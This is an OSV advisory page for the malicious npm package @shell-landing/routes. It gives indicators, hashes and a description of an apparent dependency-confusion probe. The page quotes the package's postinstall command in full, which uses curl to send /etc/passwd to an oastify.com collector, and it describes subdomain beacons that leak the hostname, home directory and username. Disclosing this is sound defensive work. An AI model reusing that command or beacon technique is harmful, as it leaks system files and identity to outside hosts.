MAL-2026-5429

See a problem?

Import Source

https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@shell-landing/routes/MAL-2026-5429.json

JSON Data

https://api.osv.dev/v1/vulns/MAL-2026-5429

Published

2026-06-09T17:19:00Z

Modified

2026-06-09T18:01:32.742969114Z

Summary

Malicious code in @shell-landing/routes (npm)

Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (6db5f32788db0c0eefee1ec8520b56ef908f8909cd79d5fdb16c2595c65f1577)

On npm install, the package's postinstall hook runs node scripts/scream3gg.js && /usr/bin/curl --data '@/etc/passwd' $(hostname).200hj786m7x4kfz1lkr4kmshu80zoqcf.oastify.com. The curl invocation POSTs the contents of /etc/passwd to an attacker-controlled Burp Collaborator subdomain, embedding the installer's hostname in the request. The companion script scripts/scream3gg.js hex-encodes os.hostname(), os.homedir(), and os.userInfo().username and beacons each as an HTTP GET subdomain of *.nmd25sur8sjp60lm75dp67e2gtmkaayz.oastify.com. The package contains no library code, no README, and no main entry — version 99.9.5 with a pure-exfil payload under the @shell-landing scope is consistent with a dependency-confusion probe targeting an internal package name. Any developer or CI running npm install will leak host identity and /etc/passwd to attacker infrastructure.

Database specific

{
    "malicious-packages-origins": [
        {
            "modified_time": "2026-06-09T17:19:00Z",
            "versions": [
                "99.9.5"
            ],
            "sha256": "6db5f32788db0c0eefee1ec8520b56ef908f8909cd79d5fdb16c2595c65f1577",
            "id": "IN-MAL-2026-005027",
            "source": "amazon-inspector",
            "import_time": "2026-06-09T17:45:49.873904036Z"
        },
        {
            "modified_time": "2026-06-09T17:19:01Z",
            "versions": [
                "99.9.5"
            ],
            "sha256": "75491d01c9adcd8b4ea3535f0aed57f3763c03e1375e84b1a20cec842ae6d5b2",
            "id": "IN-MAL-2026-005028",
            "source": "amazon-inspector",
            "import_time": "2026-06-09T17:45:49.905899507Z"
        }
    ]
}

References

https://www.npmjs.com/package/@shell-landing/routes/v/99.9.5

Credits

- Amazon Inspector - FINDER
- - inspector-research@amazon.com

Affected packages

npm / @shell-landing/routes

Package

Name: @shell-landing/routes; View open source insights on deps.dev
Purl: pkg:npm/%40shell-landing%2Froutes

Affected ranges

Affected versions

99.*

99.9.5

Database specific

indicators

{
    "domains": [
        "7363616e2d353265363663323431616637.nmd25sur8sjp60lm75dp67e2gtmkaayz.oastify.com",
        "2f686f6d652f7363616e.nmd25sur8sjp60lm75dp67e2gtmkaayz.oastify.com",
        "7363616e.nmd25sur8sjp60lm75dp67e2gtmkaayz.oastify.com"
    ],
    "evidence_files": [
        {
            "sha256": "b16d6e964a35304d2c3ab4c01fc722bd45b49c36a61c9282364719a236a8e741",
            "tlsh": "74d0a7b07800c6737acd06a38128a1457955c85b1214b96246df87e4912436174e6506",
            "path": "package.json"
        },
        {
            "sha256": "9b962b07165e35cb12a1424434b1d1be779ead9b43df94af8baf0e5a1b66a6c9",
            "tlsh": "74f08ba955b11938382b50819dafd40db1e7fa0630a6e4f2fedd86810f44865bd22dde",
            "path": "scripts/scream3gg.js"
        }
    ],
    "package_integrity": [
        {
            "filename": "routes-99.9.5.tgz",
            "hashes": {
                "sha512_sri": "sha512-hjqjPpc4nwEToGMYjs7AgvTToo5ElKYbb4ne8S18NSfwJ7rg5BUMEll/iYjPncsCnh844HTikoYzowfp0hCqlA==",
                "sha1": "f369c3ef9e1f43b4f9bcaa6f25e011336d8af992"
            }
        }
    ]
}

source

"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@shell-landing/routes/MAL-2026-5429.json"

cwes

[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]